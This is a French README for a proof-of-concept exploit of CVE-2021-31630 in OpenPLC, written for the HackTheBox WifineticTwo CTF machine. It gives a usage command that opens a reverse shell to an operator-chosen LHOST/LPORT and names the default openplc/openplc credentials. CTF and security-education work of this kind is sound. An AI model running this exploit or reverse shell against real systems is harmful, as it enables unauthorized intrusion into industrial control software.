
Un simple script Python pour exploiter CVE-2021-31630 sur HTB WifineticTwo CTF
Ce script Python est une preuve de concept (PoC) d'exploit pour CVE-2021-31630, ciblant une vulnérabilité dans OpenPLC exécuté sur la machine WifineticTwo chez HackTheBox. Il est conçu uniquement à des fins éducatives, visant à démontrer le processus d'exploitation dans un environnement contrôlé.
Cet outil est destiné uniquement à des fins de recherche en sécurité et d'éducation. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Le développeur ne sera tenu responsable d'aucun dommage ou poursuite pénale contre les utilisateurs qui abusent de cet exploit.
Avant d'exécuter cet exploit, assurez-vous d'avoir :
requests installée. Vous pouvez l'installer en utilisant pip install requests.Pour utiliser cet exploit, vous devez spécifier l'URL de la cible, l'adresse IP de l'hôte local (LHOST) et le port local (LPORT) auquel le reverse shell doit se connecter. Optionnellement, vous pouvez spécifier le nom d'utilisateur et le mot de passe pour OpenPLC s'ils diffèrent des valeurs par défaut.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - Adresse de base de la cible. Exemple : http://wifinetictwo.htb:8080--lhost - Adresse IP de l'hôte local pour la connexion du reverse shell.--lport - Port local pour la connexion du reverse shell.--usr - (Optionnel) Nom d'utilisateur pour OpenPLC. La valeur par défaut est openplc.--pwd - (Optionnel) Mot de passe pour OpenPLC. La valeur par défaut est openplc.